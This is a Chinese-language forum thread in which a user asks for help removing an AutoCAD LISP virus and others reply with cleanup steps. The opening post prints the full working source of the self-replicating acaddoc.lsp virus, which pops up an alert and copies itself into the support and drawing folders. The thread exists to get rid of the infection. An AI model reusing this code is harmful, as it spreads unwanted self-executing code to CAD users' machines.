[求助]除掉这个CAD病毒

tame · 发表于 2010-11-25 12:49:00

不知是哪天开始，CAD开始弹出“眼睛雪亮”，上网找处理方法，下载CAD专杀，也全盘扫描删除文件，最后没弹“眼睛雪亮”了，只剩下一个顽固份子，老弹“努力工作哦！！”怎么也删不掉，也杀不掉，很是烦人。

一般情况下，新建CAD文件不会弹出，只要打开某个CAD文件就会弹出，完了之后在CAD所在文件夹自动生成一个“acaddoc.lsp”文件，全盘删干净了，一开CAD文件就又来了，很是烦人。我打开这个文件看了看，也看不出个所以然来，想请各位大侠帮看看有没有办法处理，多谢！

文件内容如下：

(defun-q s::startup
(/ basepath
     baseacad
     acaddocpath
     r-acaddoc
     w-basepath
     rl-acaddoc
     acaddoclsp
     c-acaddocname
     c-acaddocpath
     c-acaddoc
    )
     (setq basepath
     (findfile "base.dcl")
     )
     (setq basepath
     (substr basepath
      1 (- (strlen basepath) 8)
            )
     )
     (setq baseacad (strcat basepath "acaddoc.lsp"))

(setq acaddocpath
               (findfile "acaddoc.lsp")
)
(setq acaddocpath
        (substr acaddocpath
         1 (- (strlen acaddocpath) 11)
        )
)
(setq acaddoclsp
        (strcat acaddocpath "acaddoc.lsp"))

        (setq c-acaddocname
        (getvar "dwgname")
)
        (setq c-acaddocpath
        (findfile c-acaddocname)
)
        (setq c-acaddocpath
        (substr c-acaddocpath
         1 (- (strlen c-acaddocpath) (strlen c-acaddocname))
  )
)
        (setq c-acaddoc
        (strcat c-acaddocpath "acaddoc.lsp")
)
          (alert "努力工作哦！！")
(if
           (and
    (/= basepath acaddocpath)
    (= c-acaddocpath acaddocpath)
    )
      (progn
        (setq r-acaddoc
        (open acaddoclsp "r")
        )
        (setq w-basepath
           (open baseacad "w")
  )
        (while
            (setq rl-acaddoc
      (read-line r-acaddoc)
            )
            (write-line rl-acaddoc w-basepath)
         )
         (close w-basepath)
                (close r-acaddoc)

             )

      (progn
        (setq r-acaddoc
        (open acaddoclsp "r")
        )
        (setq w-basepath
           (open c-acaddoc "w")
  )
         (while
            (setq rl-acaddoc
      (read-line r-acaddoc)
            )
            (write-line rl-acaddoc w-basepath)
         )
         (close w-basepath)
                (close r-acaddoc)

             )
)
(princ)
)

另附一个CAD文件样本如下。

tame · 发表于 2010-12-31 10:13:06

没人感兴趣？试过多种CAD专杀都没用。

ZZXXQQ · 发表于 2010-12-31 20:16:28

那就手工杀。
在未引导ACAD的情况下，用WINDOWS的查找功能，全盘查找ACADDOC.LSP。
将查出的文件全部删除就行了。

xiaxiang · 发表于 2011-1-6 17:57:08

ZZXXQQ 发表于 2010-12-31 20:16
那就手工杀。
在未引导ACAD的情况下，用WINDOWS的查找功能，全盘查找ACADDOC.LSP。
将查出的文件全部删除 ...

斑竹高见

戏男 · 发表于 2011-9-9 10:06:03

我没遇到过这种情况

874185423 · 发表于 2011-9-27 06:22:09

这种问题很烦人，我的电脑也这样

qfkxc · 发表于 2011-9-29 12:23:52

在命令行中输入以下语句：

(while (or (setq a (findfile "acad.fas")) (setq a (findfile "lcm.fas"))) (vl-file-delete a))

回车后关闭AutoCAD，重新启动AutoCAD后你就会发现一切都正常了。

czb203 · 发表于 2011-11-18 11:19:33

cad现在很多的病毒希望高手能解决

s305040093 · 发表于 2012-1-30 20:20:51

其实这种lisp病毒并不难去掉因为源代码完全公开只要在lisp里调试一遍，就可以知道病毒的运作原理了

s305040093 · 发表于 2012-1-30 20:28:36

通常采取全盘搜索删除都是不好用的一般的病毒都会把代码写进*.lsp与*.mnl文件内，然后再复制一个acaddoc.lsp文件用来传播。一般把病毒代码找出来删干净以后将support目录设为只读就行了。绝大部分病毒都不改变原来文件的属性。因为这些文件都是cad启动后自动运行的
最笨的解决办法就是先关闭cad。全盘搜索acaddoc.lsp(前提是病毒没有更改隐藏文件的显示)，然后将没有病毒的cad的support路径下（有两处）的文件全部拷贝过来。然后设为只读。一般就可以解决问题了

账号		自动登录	找回密码
密码			注册

[求助]除掉这个CAD病毒

本帖子中包含更多资源